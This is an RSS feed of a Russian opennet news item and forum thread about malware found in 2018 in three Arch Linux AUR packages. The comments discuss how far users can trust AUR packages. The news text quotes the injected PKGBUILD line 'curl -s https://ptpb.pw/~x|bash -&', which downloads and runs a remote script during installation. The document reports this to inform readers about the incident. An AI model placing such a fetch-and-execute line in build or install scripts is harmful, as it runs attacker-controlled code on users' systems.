<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: В AUR-репозитории Arch Linux найдено вредоносное ПО</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html</link>
    <description>В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах &lt;br&gt;acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и  minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;7 июля в пакеты были внесены изменения, в результате которых&lt;br&gt;в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&amp;id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc) код &quot;curl -s https://ptpb.pw/~x&amp;#124;bash -&amp;&quot; вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта  &quot;https://</description>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (lucentcode)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#142</link>
    <pubDate>Sun, 29 Jul 2018 20:49:35 GMT</pubDate>
    <description>&amp;gt; просто не метод всё глазами и руками делать, так можно дойти до &lt;br&gt;&amp;gt; самостоятельного написания нужных лично программ &lt;br&gt;&amp;gt; тут скорее нужны наработки &quot;защищённых андройдов&quot; с песочницами, подстановкой виртуальных &lt;br&gt;&amp;gt; данных вместо реальных и тд &lt;br&gt;&lt;br&gt;Согласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (arisu)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#141</link>
    <pubDate>Mon, 16 Jul 2018 17:03:46 GMT</pubDate>
    <description>вот тебе, например, рабочих мозгов надо.&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (Celcion)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#140</link>
    <pubDate>Mon, 16 Jul 2018 07:24:59 GMT</pubDate>
    <description>&amp;gt; ...и к нему контрольная сумма прилагается.&lt;br&gt;&amp;gt; ...если контрольная сумма не совпадает (программа подменена или обновлена) &amp;#8212; сборка и установка пакета не происходит.&lt;br&gt;&lt;br&gt;Верно. Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом самом внешнем сайте, даже если он проходит валидацию - не запихали в одном из релизов вошек? Какой-то неизвестный Вася, собиравший PGKBUILD, тебе за это поручится?&lt;br&gt;Понятно, что это не будет проблемой AUR-а как таковой, но сам по себе AUR никто и не обвинял. Вопрос в том, что установка бинарных пакетов - есть. Со всеми из этого вытекающими потенциальными проблемами. Какой смысл с этим спорить, дескать, &quot;а бинари не на самом AUR-е лежат!&quot; - я фиг знает.&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (Celcion)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#139</link>
    <pubDate>Mon, 16 Jul 2018 07:16:29 GMT</pubDate>
    <description>&amp;gt; Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.&lt;br&gt;&lt;br&gt;Остаться правым можно в случае, если был какой-то спор. А когда ты говоришь про Фому, а тебе упорно в ответ талдычат про Ерёму - это не спор, а просто тупoсть. Но многих здесь это, видимо, устраивает.&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (FSA)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#138</link>
    <pubDate>Sun, 15 Jul 2018 10:22:45 GMT</pubDate>
    <description>Вот реально в фоне бывает крутится сборка какого-то крупного обновления. Из неудобств, повышенный нагрев ноутбука небольшой и немного подёргивается Youtube иногда. При этом IDE работает нормально, gulp работает нормально, веб-сервер с PHP и MySQL работает приемлемо. Можно даже под Android проект собирать. А вот когда Windows начинает что-то ставить, хоть вешайся. Такое чувство, что она обновления из исходников собирает. При этом проблемы бывают даже с перемещением курсора. А самое главное, можно запускать сборку обновлений в тот момент, когда тебе особо компьютер не нужен, а вот Windows может это сделать тогда, когда вздумает нужным или вообще поставит перед фактом, мол давай-ка перезагрузимся, после чего пол часа висит на установке обновлений и вообще ничего делать не даёт. Особенно радует, когда играешь в танки и тут срочно что-то надо сделать. Закрываешь танки и пытаешься загрузить Linux. Но нет, Windows нужно установить обновления. Я однажды не выдержал и перезагрузился жёстко. Поработал, а обратно в Wind</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (чебурнет.рф)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#137</link>
    <pubDate>Sun, 15 Jul 2018 02:27:17 GMT</pubDate>
    <description>Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты. &lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#136</link>
    <pubDate>Sat, 14 Jul 2018 17:52:56 GMT</pubDate>
    <description>Все завидуют,ага.&lt;br&gt;Особенно bsdишники и гентушники ХD&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#135</link>
    <pubDate>Sat, 14 Jul 2018 17:50:03 GMT</pubDate>
    <description>&amp;gt;В AUR-репозитории Arch Linux найдено вредоносное ПО &lt;br&gt;&lt;br&gt;А сколько ещё не выявлено.) &lt;br&gt;Зато модно стильно и молодёжно.&lt;br&gt;</description>
</item>

<item>
    <title>В AUR-репозитории Arch Linux найдено вредоносное ПО (Джон Ленин)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/114809.html#134</link>
    <pubDate>Fri, 13 Jul 2018 22:33:10 GMT</pubDate>
    <description>Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальную репу llvm-svn&lt;br&gt;&lt;br&gt;Там такая логика, что без одного ты не соберёшь другое, а собирать всё из сорцов &amp;#8212; жизни не хватит чтоб разобраться с еггогами.&lt;br&gt;</description>
</item>

</channel>
</rss>
